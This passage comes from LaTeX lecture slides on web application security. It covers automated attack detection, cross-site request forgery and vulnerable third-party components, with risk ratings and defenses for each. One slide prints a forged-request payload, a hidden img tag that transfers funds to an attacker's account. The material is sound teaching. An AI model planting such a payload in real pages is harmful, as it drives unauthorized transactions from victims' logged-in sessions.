	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}
\item Attacker: anyone able to send requests
\item Easily exploitable
\item Common vulnerability
\item Average detectability
\item Moderate severity
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{itemize}[<+->]
\item An attacker uses an automated tool to detect and exploit vulnerabilities
	\begin{itemize}
	\item Unusual requests both in amount and shape
	\item The system should detect that the application is targeted 
	\end{itemize}
\item A human attacker carefully pokes the application to discover vulnerabilities
	\begin{itemize}
	\item Much harder to detect
	\item Entries impossible to generate with the interface?
	\end{itemize}
\item An attacker exploits a flaw that the current system cannot block
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection et prevention}
\begin{exampleblock}<+->{Detection}
	\begin{itemize}[<+->]
	\item Use regex to detect invalid entries that cannot be generated
	\item The application is used in "unusual" ways
		\begin{itemize}		
		\item Pace is too fast, atypical entries, repeated requests, etc.
		\item Use Bayesian filters
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Prevention}
	\begin{itemize}[<+->]
	\item Log and notifications analysis
	\item Automatically block some requests and IPs
	\item Monitor or banish suspicious accounts
	\item Fast patch deployment
		\begin{itemize}
		\item If possible, virtual patches to analyse traffic
		\item At worst, block/stop vulnerable services
		\end{itemize}
	\end{itemize}	
\end{exampleblock}
\end{frame}

\subsection{Cross site request forgery (CSRF)}

\begin{frame}
\frametitle{Vulnerability}
\begin{itemize}[<+->]
\item CSRF takes advantage of the fact that applications are "predictable"
	\begin{itemize}
	\item If some action is performed, all associated details can be predicted
	\end{itemize}
\item Browsers send autorisations (cookies, etc.) automatically
\end{itemize}
\begin{exampleblock}<+->{Principle}
	\begin{itemize}[<+->]
	\item The attacker first infect a user (\emph{e.g.,} with an XSS attack)
		\begin{itemize}
		\item Malicious pages are created
		\end{itemize}
	\item He uses the user to send fraudulent requests to the server
	\item Forged requests are undistinguishable from genuine ones
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Detection is relatively easy with penetration tests and code analysis
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}
\item Attacker: anyone able to load content into the browser of a user
\item Average exploitability
\item Uncommon vulnerability
\item Easy detection
\item Moderate severity
\end{enumerate}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item Vulnerable code: any sensitive code not including anything secret/random
\end{itemize}
\begin{lstlisting}
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
\end{lstlisting}
\begin{itemize}
\item Forged request
\end{itemize}
\begin{lstlisting}
<img src="http://example.com/app/transferFunds?amount=1500
	&destinationAccount=attackersAcct#" width="0" height="0" />
\end{lstlisting}
\begin{itemize}
\item The user visits a page under the control of the attacker while logged 
	\begin{itemize}
	\item The forged request will include data of the user's session
	\item It will succeed
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection et prevention}
\begin{exampleblock}<+->{Detection}
	\begin{itemize}[<+->]
	\item Automated penetration tests
	\item Code analysis
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Prevention}
	\begin{enumerate}[<+->]
	\item Use existing CSRF defense
		\begin{itemize}
		\item The vast majority of framework use that
		\end{itemize}
	\item Include random tokens, unique per active session
		\begin{itemize}
		\item Included in hidden field (URL injection)
		\item Use the flag «~SameSite=strict~»
			\begin{itemize}
			\item Supported by \emph{most} browsers
			\end{itemize}
		\end{itemize}
	\end{enumerate}	
\end{exampleblock}
\end{frame}

\subsection{Using components with known vulnerabilities}

\begin{frame}
\frametitle{Principle}
\begin{itemize}[<+->]
\item Exploit known flaws
\item Vulnerable components can be detected
	\begin{itemize}
	\item manually
	\item automatically
	\item by reverse engineering
	\end{itemize}
\item It is imperative to know the versions and vulnerabilities of the components you use
	\begin{itemize}
	\item Including nested dependencies
	\end{itemize}
\item The flaw is exploited depending of the "needs" of the attacker
\item The risk can be total
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Risk analysis}
\begin{enumerate}
\item Attacker: anyone
\item Average exploitability
\item Common vulnerability
\item Average detectability
\item Moderate severity
\end{enumerate}
\end{frame}

\begin{frame}
\frametitle{Problem}
\begin{exampleblock}<+->{Challenge}
	\begin{itemize}[<+->]
	\item Continually monitor the components you use for vulnerabilities reports
	\end{itemize}
\end{exampleblock}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item No standard reporting
		\begin{itemize}
		\item Necessary compulsion
		\end{itemize}
	\item Many vulnerabilities are never reported
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Usually, mailing lists subscriptions
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Illustration}
\begin{itemize}[<+->]
\item Apache CXF Authentication Bypass (services framework)
	\begin{itemize}
	\item No authentication token
	\item Allows to invoke any service with full rights
	\end{itemize}
\item Struts 2 Remote Code Execution
	\begin{itemize}
	\item Send an attack in the "Content Type" header
	\item Content parsed as an OGNL expression
	\item Allows to execute random code on the server side
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Detection and prevention}
\begin{exampleblock}<+->{Detection}
	\begin{itemize}[<+->]
	\item Dependencies tests
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Prevention}
	\begin{itemize}[<+->]
	\item Keep components updated
		\begin{itemize}
		\item Or virtual patch
		\end{itemize}
	\item Avoid vulnerable components
	\item Make sure the services are invoked on execution
		\begin{itemize}
		\item Most of services / components are never used
		\end{itemize}
	\end{itemize}	
\end{exampleblock}
\end{frame}

\end{document}
